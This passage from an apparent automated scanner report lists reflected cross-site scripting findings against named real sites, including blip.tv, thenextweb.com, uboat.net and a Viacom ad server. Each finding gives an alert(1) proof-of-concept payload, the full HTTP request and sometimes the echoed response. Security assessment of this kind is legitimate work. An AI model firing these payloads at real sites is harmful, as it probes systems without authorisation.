The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a96b9'%3balert(1)//ac16476f5de was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a96b9';alert(1)//ac16476f5de in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /posts?a96b9'%3balert(1)//ac16476f5de=1 HTTP/1.1 Host: sourceboston2008.blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
3.86. http://sourceboston2008.blip.tv/posts [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://sourceboston2008.blip.tv
Path: /posts
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf6a5"><script>alert(1)</script>1e232d81774 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /posts?bf6a5"><script>alert(1)</script>1e232d81774=1 HTTP/1.1 Host: sourceboston2008.blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
3.87. http://sourceboston2009.blip.tv/posts [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://sourceboston2009.blip.tv
Path: /posts
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 22f00'%3balert(1)//ce990a6fdd2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 22f00';alert(1)//ce990a6fdd2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /posts?22f00'%3balert(1)//ce990a6fdd2=1 HTTP/1.1 Host: sourceboston2009.blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
3.88. http://sourceboston2009.blip.tv/posts [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://sourceboston2009.blip.tv
Path: /posts
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 282e3"><script>alert(1)</script>0b14ceaf125 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /posts?282e3"><script>alert(1)</script>0b14ceaf125=1 HTTP/1.1 Host: sourceboston2009.blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
3.89. http://sourceboston2010.blip.tv/posts [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://sourceboston2010.blip.tv
Path: /posts
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ca2b"><script>alert(1)</script>973845e00e3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /posts?3ca2b"><script>alert(1)</script>973845e00e3=1 HTTP/1.1 Host: sourceboston2010.blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
3.90. http://sourceboston2010.blip.tv/posts [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://sourceboston2010.blip.tv
Path: /posts
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eccf8'%3balert(1)//75f0ef58d87 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as eccf8';alert(1)//75f0ef58d87 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /posts?eccf8'%3balert(1)//75f0ef58d87=1 HTTP/1.1 Host: sourceboston2010.blip.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the awesm request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 82105</script><script>alert(1)</script>ebaf4f8c75 was submitted in the awesm parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /industry/2011/03/31/beyond-analytics-viglink-automates-affiliate-links-to-pay-publishers/?awesm=tnw.to_17gUX82105</script><script>alert(1)</script>ebaf4f8c75&utm_content=twitter-publisher-main&utm_medium=tnw.to-twitter&utm_source=direct-tnw.to HTTP/1.1 Host: thenextweb.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
3.92. http://thenextweb.com/industry/2011/03/31/beyond-analytics-viglink-automates-affiliate-links-to-pay-publishers/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5d8bd</script><script>alert(1)</script>73986555b6d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /industry/2011/03/31/beyond-analytics-viglink-automates-affiliate-links-to-pay-publishers/?5d8bd</script><script>alert(1)</script>73986555b6d=1 HTTP/1.1 Host: thenextweb.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the utm_content request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e9bcc</script><script>alert(1)</script>f5ad851bd4d was submitted in the utm_content parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /industry/2011/03/31/beyond-analytics-viglink-automates-affiliate-links-to-pay-publishers/?awesm=tnw.to_17gUX&utm_content=twitter-publisher-maine9bcc</script><script>alert(1)</script>f5ad851bd4d&utm_medium=tnw.to-twitter&utm_source=direct-tnw.to HTTP/1.1 Host: thenextweb.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the utm_medium request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8d1ad</script><script>alert(1)</script>24749fe4f25 was submitted in the utm_medium parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /industry/2011/03/31/beyond-analytics-viglink-automates-affiliate-links-to-pay-publishers/?awesm=tnw.to_17gUX&utm_content=twitter-publisher-main&utm_medium=tnw.to-twitter8d1ad</script><script>alert(1)</script>24749fe4f25&utm_source=direct-tnw.to HTTP/1.1 Host: thenextweb.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the utm_source request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5a19e</script><script>alert(1)</script>fa26e178082 was submitted in the utm_source parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /industry/2011/03/31/beyond-analytics-viglink-automates-affiliate-links-to-pay-publishers/?awesm=tnw.to_17gUX&utm_content=twitter-publisher-main&utm_medium=tnw.to-twitter&utm_source=direct-tnw.to5a19e</script><script>alert(1)</script>fa26e178082 HTTP/1.1 Host: thenextweb.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f2a26<script>alert(1)</script>f4d51860e62 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /favicon.icof2a26<script>alert(1)</script>f4d51860e62 HTTP/1.1 Host: uboat.net Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utma=197206507.357766803.1303244360.1303244360.1303244360.1; __utmb=197206507; __utmc=197206507; __utmz=197206507.1303244360.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/14|utmcmd=referral
The value of REST URL parameter 1 is copied into an HTML comment. The payload eeee5--><script>alert(1)</script>d24a13b2fbf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /favicon.icoeeee5--><script>alert(1)</script>d24a13b2fbf HTTP/1.1 Host: uboat.net Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utma=197206507.357766803.1303244360.1303244360.1303244360.1; __utmb=197206507; __utmc=197206507; __utmz=197206507.1303244360.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/14|utmcmd=referral
The value of REST URL parameter 1 is copied into an HTML comment. The payload 8e308--><script>alert(1)</script>08f8526848f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /history8e308--><script>alert(1)</script>08f8526848f/wwi/ HTTP/1.1 Host: uboat.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: nginx/0.8.54 Date: Tue, 19 Apr 2011 19:48:08 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.2-1ubuntu4.7 Vary: Accept-Encoding Content-Length: 9023
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> < ...[SNIP]... <!--404, /history8e308--><script>alert(1)</script>08f8526848f/wwi/, Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0), /history8e308--> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ba0c5<script>alert(1)</script>d32186e7767 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /historyba0c5<script>alert(1)</script>d32186e7767/wwi/ HTTP/1.1 Host: uboat.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: nginx/0.8.54 Date: Tue, 19 Apr 2011 19:48:07 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.2-1ubuntu4.7 Vary: Accept-Encoding Content-Length: 8906
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> < ...[SNIP]... <strong>http://uboat.net/historyba0c5<script>alert(1)</script>d32186e7767/wwi/</strong> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1dfcc<script>alert(1)</script>3770393b851 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /history/wwi1dfcc<script>alert(1)</script>3770393b851/ HTTP/1.1 Host: uboat.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: nginx/0.8.54 Date: Tue, 19 Apr 2011 19:48:08 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.2-1ubuntu4.7 Vary: Accept-Encoding Content-Length: 9014
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> < ...[SNIP]... <strong>http://uboat.net/history/wwi1dfcc<script>alert(1)</script>3770393b851/</strong> ...[SNIP]...
The value of REST URL parameter 2 is copied into an HTML comment. The payload 3a303--><script>alert(1)</script>de1b2bc497a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /history/wwi3a303--><script>alert(1)</script>de1b2bc497a/ HTTP/1.1 Host: uboat.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: nginx/0.8.54 Date: Tue, 19 Apr 2011 19:48:09 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.2-1ubuntu4.7 Vary: Accept-Encoding Content-Length: 8922
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> < ...[SNIP]... <!--404, /history/wwi3a303--><script>alert(1)</script>de1b2bc497a/, Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0), /history/wwi3a303--> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d1407'%3balert(1)//6b06bfedd3b was submitted in the REST URL parameter 2. This input was echoed as d1407';alert(1)//6b06bfedd3b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /AFTRSERVER/hserverd1407'%3balert(1)//6b06bfedd3b//height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1//ATCI=1303072666-9018543 HTTP/1.1 Host: viacom.adbureau.net Proxy-Connection: keep-alive Referer: http://redcated/PTR/iview/240321409/direct;wi.1;hi.1/01?relocate=http://viacom.adbureau.net/AFTRSERVER/hserver//height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0004CDECE75F0DAD1C03232061626364; LE4=+5aqvjsKq+414+4
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.2.25 (Red Hat Linux Enterprise 4; Pentium) Date: Tue, 19 Apr 2011 20:02:17 GMT X-DirectServer: viacom_DS21 Content-Type: text/html Content-Length: 2332 Pragma: no-cache Cache-control: no-cache Set-Cookie: AA002=1303072666-9018543; expires=Fri, 22 Apr 2011 20:02:17 GMT; path=/; domain=viacom.adbureau.net P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV" Connection: close
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 52531'%3balert(1)//e133daf0ee1 was submitted in the REST URL parameter 3. This input was echoed as 52531';alert(1)//e133daf0ee1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /AFTRSERVER/hserver//height52531'%3balert(1)//e133daf0ee1=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1//ATCI=1303072666-9018543 HTTP/1.1 Host: viacom.adbureau.net Proxy-Connection: keep-alive Referer: http://redcated/PTR/iview/240321409/direct;wi.1;hi.1/01?relocate=http://viacom.adbureau.net/AFTRSERVER/hserver//height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0004CDECE75F0DAD1C03232061626364; LE4=+5aqvjsKq+414+4
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.2.25 (Red Hat Linux Enterprise 4; Pentium) Date: Tue, 19 Apr 2011 20:02:17 GMT X-DirectServer: viacom_DS25 Content-Type: text/html Content-Length: 2332 Pragma: no-cache Cache-control: no-cache Set-Cookie: AA002=1303072666-9018543; expires=Fri, 22 Apr 2011 20:02:17 GMT; path=/; domain=viacom.adbureau.net P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV" Connection: close
var payload5292, tempStr, tempInt, aamWidth, aamHeight, atlasUr ...[SNIP]... tr = destStr.substring((destStr.length - 7)); if (tempStr.search(/\?click\=/i) > -1) destStr += 'http://viacom.adbureau.net/accipiter/adclick/CID=000014ac0000000000000000//height52531';alert(1)//e133daf0ee1=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1//ATCI=1303072666-9018543/relocate=';
} else /* Use the Payload if it has content */ destStr = 'javascript:parent.payload ...[SNIP]...
3.104. http://viacom.adbureau.net/AFTRSERVER/hserver//height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1//ATCI=1303072666-9018543 [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f655b'%3balert(1)//9025d8e1577 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f655b';alert(1)//9025d8e1577 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /AFTRSERVER/hserver//height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1//ATCI=1303072666-9018543?f655b'%3balert(1)//9025d8e1577=1 HTTP/1.1 Host: viacom.adbureau.net Proxy-Connection: keep-alive Referer: http://redcated/PTR/iview/240321409/direct;wi.1;hi.1/01?relocate=http://viacom.adbureau.net/AFTRSERVER/hserver//height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0004CDECE75F0DAD1C03232061626364; LE4=+5aqvjsKq+414+4
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.2.25 (Red Hat Linux Enterprise 4; Pentium) Date: Tue, 19 Apr 2011 20:02:17 GMT X-DirectServer: viacom_DS17 Content-Type: text/html Content-Length: 2335 Pragma: no-cache Cache-control: no-cache Set-Cookie: AA002=1303072666-9018543?f655b'%3balert(1); expires=Fri, 22 Apr 2011 20:02:17 GMT; path=/; domain=viacom.adbureau.net P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV" Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8b4dd'%3balert(1)//9cd18a86ff4 was submitted in the REST URL parameter 1. This input was echoed as 8b4dd';alert(1)//9cd18a86ff4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hserver8b4dd'%3balert(1)//9cd18a86ff4/height=250/width=300/site=SOUTHPARKSTUDIOS.MTVI/aamsz=300X250/NCP=1 HTTP/1.1 Host: viacom.adbureau.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0004CDECE75F0DAD1C03232061626364; LE4=+5aqvjsKq+414+4; AA002=1303072666-9018543
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.2.25 (Red Hat Linux Enterprise 4; Pentium) Date: Tue, 19 Apr 2011 20:06:02 GMT X-DirectServer: viacom_DS22 Content-Type: text/html Content-Length: 2310 Pragma: no-cache Cache-control: no-cache P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV" Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e6779'%3balert(1)//985a6732d77 was submitted in the REST URL parameter 2. This input was echoed as e6779';alert(1)//985a6732d77 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hserver/heighte6779'%3balert(1)//985a6732d77=250/width=300/site=SOUTHPARKSTUDIOS.MTVI/aamsz=300X250/NCP=1 HTTP/1.1 Host: viacom.adbureau.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0004CDECE75F0DAD1C03232061626364; LE4=+5aqvjsKq+414+4; AA002=1303072666-9018543
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.2.25 (Red Hat Linux Enterprise 4; Pentium) Date: Tue, 19 Apr 2011 20:06:02 GMT X-DirectServer: viacom_DS22 Content-Type: text/html Content-Length: 9999 Pragma: no-cache Cache-control: no-cache P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV" Connection: close
3.107. http://viacom.adbureau.net/hserver/height=250/width=300/site=SOUTHPARKSTUDIOS.MTVI/aamsz=300X250/NCP=1 [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 56888'%3balert(1)//4857672fae1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 56888';alert(1)//4857672fae1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hserver/height=250/width=300/site=SOUTHPARKSTUDIOS.MTVI/aamsz=300X250/NCP=1?56888'%3balert(1)//4857672fae1=1 HTTP/1.1 Host: viacom.adbureau.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0004CDECE75F0DAD1C03232061626364; LE4=+5aqvjsKq+414+4; AA002=1303072666-9018543
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.2.25 (Red Hat Linux Enterprise 4; Pentium) Date: Tue, 19 Apr 2011 20:06:02 GMT X-DirectServer: viacom_DS24 Content-Type: text/html Content-Length: 2858 Pragma: no-cache Cache-control: no-cache P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV" Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 10202'%3balert(1)//4440355789c was submitted in the REST URL parameter 1. This input was echoed as 10202';alert(1)//4440355789c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hserver10202'%3balert(1)//4440355789c/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1 HTTP/1.1 Host: viacom.adbureau.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0004CDECE75F0DAD1C03232061626364
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.2.25 (Red Hat Linux Enterprise 4; Pentium) Date: Tue, 19 Apr 2011 20:02:09 GMT X-DirectServer: viacom_DS24 Content-Type: text/html Content-Length: 2306 Pragma: no-cache Cache-control: no-cache P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV" Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cac12'%3balert(1)//af0eabc09d9 was submitted in the REST URL parameter 2. This input was echoed as cac12';alert(1)//af0eabc09d9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hserver/heightcac12'%3balert(1)//af0eabc09d9=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1 HTTP/1.1 Host: viacom.adbureau.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0004CDECE75F0DAD1C03232061626364
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.2.25 (Red Hat Linux Enterprise 4; Pentium) Date: Tue, 19 Apr 2011 20:02:09 GMT X-DirectServer: viacom_DS25 Content-Type: text/html Content-Length: 2306 Pragma: no-cache Cache-control: no-cache P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV" Connection: close
var payload5292, tempStr, tempInt, aamWidth, aamHeight, atlasUr ...[SNIP]... Str = destStr.substring((destStr.length - 7)); if (tempStr.search(/\?click\=/i) > -1) destStr += 'http://viacom.adbureau.net/accipiter/adclick/CID=000014ac0000000000000000/heightcac12';alert(1)//af0eabc09d9=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1/relocate=';
} else /* Use the Payload if it has content */ destStr = 'javascript:parent.payload5292';
/* Try ...[SNIP]...
3.110. http://viacom.adbureau.net/hserver/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1 [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 400d4'%3balert(1)//32c671dbab7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 400d4';alert(1)//32c671dbab7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hserver/height=90/width=728/site=SOUTHPARKSTUDIOS.MTVI/aamsz=728X90/NCP=1?400d4'%3balert(1)//32c671dbab7=1 HTTP/1.1 Host: viacom.adbureau.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0004CDECE75F0DAD1C03232061626364
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.2.25 (Red Hat Linux Enterprise 4; Pentium) Date: Tue, 19 Apr 2011 20:02:09 GMT X-DirectServer: viacom_DS15 Content-Type: text/html Content-Length: 2309 Pragma: no-cache Cache-control: no-cache P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV" Connection: close
} else /* Use the Payload if it has content */ destStr = 'javascript:parent.payload5292';
/* Try to get the width and height from AAMLib first */ / ...[SNIP]...
3.111. http://www.barracudanetworks.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.barracudanetworks.com
Path: /
Issue detail
